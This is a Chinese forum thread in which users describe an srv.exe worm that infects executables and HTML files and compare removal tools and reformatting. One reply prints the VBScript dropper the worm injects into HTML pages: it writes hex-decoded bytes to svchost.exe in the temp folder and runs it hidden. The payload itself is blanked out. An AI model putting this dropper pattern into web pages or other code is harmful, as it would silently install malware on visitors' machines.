孤傲 发表于 2016-9-6 19:57

对srv.exe蠕虫病毒的个人分析(大神勿喷)

以下所说的仅为个人观点,因为我中的就是这种病毒

特征:文件运行后,同目录下会出现一个原名 srv.exe的文件

对于这病毒,我电脑到现在还存在着,很是丧心病狂啊,被迫的研究了一下。。最后来个总结吧,仅代表我中的那个srv病毒

病毒劫持/改写系统某文件,首先对运行中的文件进行感染,然后搜索磁盘文件进行感染,这里得说一下特征,被感染的文件通常运行后都会出现一个源文件名 sev.exe的可执行文件,很奇怪的是,这文件并没有被占用,可以直接删除…
然后检测了一下它的运行轨迹,基本可以这样判断了,首先,病毒携带者(中了病毒的文件)一旦被打开,释放了病毒文件后,检测系统是否已经中了这种病毒,是的话,不会再次感染,一旦没有,将会进行感染,然后你的系统里面所有的可执行文件就会变成病毒母体,等待传播到下一个电脑的时候就会再次爆发,然后无限循环,丧心病狂啊,病毒的目的我无从得知,一些杀毒软件的确能KO掉它,没错是这样的,但问题来了,重点在下面

1.压缩文件
2.加密后的不可执行文件
3.一些安装包里面的文件
4.........
很多很多的文件类型,杀毒软件也是束手无策
然后我们还得面对后面的变种,升级等问题………

各位游客们,我们很抱歉的通知您,由于作死的笔者脑子短路并堵塞,暂无解决方案,请各位游客谅解。
(作死的我已经付出了沉重的代价(一怒之下全盘低格)才清除了这丧心病狂的病毒,并且我把所有软件先在虚拟机运行一遍才敢用……一朝被蛇咬十年怕井绳啊……)

鬼狐 发表于 2016-9-6 20:23

不止这样它还会修改HTML类型的文件进行下一个文件的感染代码如下

DropFileName = "svchost.exe"
WriteData = "XXXXX"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
从上代码看来创建一个svchost.exe文件,然后把WriteData中包含的一段16进制字符串转为16进制代码并写入文件中,最后执行这个文件。
从而达到HTML感染其它文件的目的。
但是现在360能成功扫描出而且已经有专杀了

eric007007 发表于 2018-10-25 16:48

随风潜入 发表于 2016-9-7 21:07
360也杀不掉吗,不是说360对所有有点异常的都杀吗。。。。

360是连带主体一起删掉,有一个专杀不是诺顿那个,国产的一个小专杀,很好用,在安全模式下全盘扫,大概需要4小时左右,然后可以坚持一段时间干净,过些日子,你打开一个硬盘不常打开的exe软件,就有出现SRV,然后疯狂的又要来一次,我是把c盘里有个C:\Program Files\Microsoft\desktopxxx.EXE直接创建个空白TXT然后重命名同名EXE,保存只读,抗了一段时间,但依然会爆发,每次爆发就安全模式下用小专杀软件扫描,烦死了,用杀毒软件直接把主体的EXE和病毒的srv.exe一起删除,我是头大的要炸,很多古老的收藏老游戏好的绿色好软件全部毁于一旦

万一行了呢 发表于 2016-9-6 20:06

这个意思是除了格,杀不掉?

52pojieYiHui 发表于 2016-9-6 20:10

诺顿的专杀对于我这种安装了固态一类的用户还是很快的

羞涩 发表于 2016-9-6 20:10

无情绝恋 发表于 2016-9-6 20:14

52pojieYiHui 发表于 2016-9-6 20:10
诺顿的专杀对于我这种安装了固态一类的用户还是很快的

就算可以杀掉,也不可能是全部吧,毕竟科技就这么牛逼。

晓贤 发表于 2016-9-6 20:18

格C盘装系统了用杀软全盘扫描

陈而戈 发表于 2016-9-6 20:25

已有专杀~~ 图标是个小锤子

macrokk 发表于 2016-9-6 20:45

对,我之前也是遇到过,因为有一次是设计一个页面,突然发现html被自动加上了一段奇怪的代码,然后所有的html文件都被加上了。,后来,格C盘,重装,然后装了一个最坑爹的3某0,全盘扫,好多自己的小软件也被杀了。。然后就没有然后了

梦碎 发表于 2016-9-6 20:48

有专杀软件不过。杀完有点异常。 win10 SRV不会全盘感染会对你打开的那个软件出现SRV.exe
页: [1] 2 3 4
查看完整版本: 对srv.exe蠕虫病毒的个人分析(大神勿喷)